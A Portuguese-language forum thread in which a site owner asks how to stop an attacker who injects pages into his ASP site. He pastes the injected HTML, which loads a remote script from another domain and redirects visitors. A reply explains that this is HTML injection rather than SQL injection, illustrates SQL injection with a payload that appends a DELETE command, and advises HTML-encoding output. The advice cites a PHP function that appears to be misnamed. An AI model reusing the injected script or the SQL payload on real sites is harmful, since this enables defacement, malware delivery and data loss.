Ir para conteúdo
Fórum Script Brasil
  • 0

Sql Injection


matrix2003

Pergunta

pessoal preciso de uma ajuda muito dos brilhantes deste forum tem um engraçadinho dono da www.hostmega.com que esta colocando em meu site em todas as paginas varias paginas tipo default.asp index.asp e outras com o seguinte conteudo

CODE

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Provedor de Hospedagem de Sites e revenda de hospedagem.</title></head><script type='text/javascript' src='http://www.tce.rn.gov.br/sitenovo/03.js'></script><body></body><script> window.location="http://www.hostmega.com/"; </script>

Sera que existe uma forma de poder parar este engraçadinho e colocando também virus alguém pdoe em dar uma ideia tipo um comando que resolveria o sql acho que é sql pois ele consegui em todas as paginas colocar arquivos paginas o que quizer me ajudem

Link para o comentário
Compartilhar em outros sites

3 respostass a esta questão

Posts Recomendados

  • 0
Guest Rolf Ezequiel
pessoal preciso de uma ajuda muito dos brilhantes deste forum tem um engraçadinho dono da www.hostmega.com que esta colocando em meu site em todas as paginas varias paginas tipo default.asp index.asp e outras com o seguinte conteudo

CODE

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Provedor de Hospedagem de Sites e revenda de hospedagem.</title></head>&lt;script type='text/javascript' src='http://www.tce.rn.gov.br/sitenovo/03.js'></script><body></body>&lt;script> window.location="http://www.hostmega.com/"; </script>

Sera que existe uma forma de poder parar este engraçadinho e colocando também virus alguém pdoe em dar uma ideia tipo um comando que resolveria o sql acho que é sql pois ele consegui em todas as paginas colocar arquivos paginas o que quizer me ajudem

Matrix2003,

Não creio que seja SQL injection. SQL Injection pode ser evitada incluindo o caractere "escape" da linguagem que você esteja utilizando. Por exemplo, PHP utiliza "\" (barra invertida) para dizer que o próximo caractere faz parte da string. P ex.: "O \"mundo\" é Azul" --> O "mundo" é Azul.

Já o VBasic você precisa fazer o seguinte: "O ""mundo"" é Azul" --> O "mundo" é Azul. A grande sacado do SQL Injection é que ele se utiliza da formação da string para realizar um ataque no Banco de Dados. Os comandos SQL são strings. Quando você tem um campo do tipo string na tabela, e precisa fazer um INSERT, você faz: "INSERT INTO tabela VALUES 'Valor'". Note a aspa simples envolta de "Valor". Imagine que o valor é determinado por uma caixa de texto no formulário. Você faria assim: "INSERT INTO tabela VALUES '" & CAIXATEXTO.Value & "'". Agora é que ocorre o problema. No SQL o delimitador de String é o caractere "'" (Aspa simples). Se você acrescentar na sua CAIXATEXTO o valor {"Valor'; DELETE FROM tabela WHERE campo LIKE '%"} (Sem as chaves), você estaria exectando dois comandos SQL:

INSERT INTO tabela VALUES 'Valor';

DELETE FROM tabela WHERE campo LIKE '%'

Entendido?

No seu caso, o problema é mais simples. Na caixa de texto, o engraçadinho deve estar colocando os caracteres "<" e ">" e quando esse conteúdo é impresso no Site, o browser, logicamente, interpreta como HTML. O que você deve fazer é imprimir no Site o equivalente imprimível de "<" e ">". Se não me falha a memória o comando é o seguinte no PHP: <?php=html_encode(string) ?>. No VBScript tem um comando semelhante que esqueci qual é. Procura na Net por "HTML ENCODE ASP" que você ahca alguma coisa a respeito.

Espero ter ajudado.

Link para o comentário
Compartilhar em outros sites

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152k
    • Posts
      651,8k
×
×
  • Criar Novo...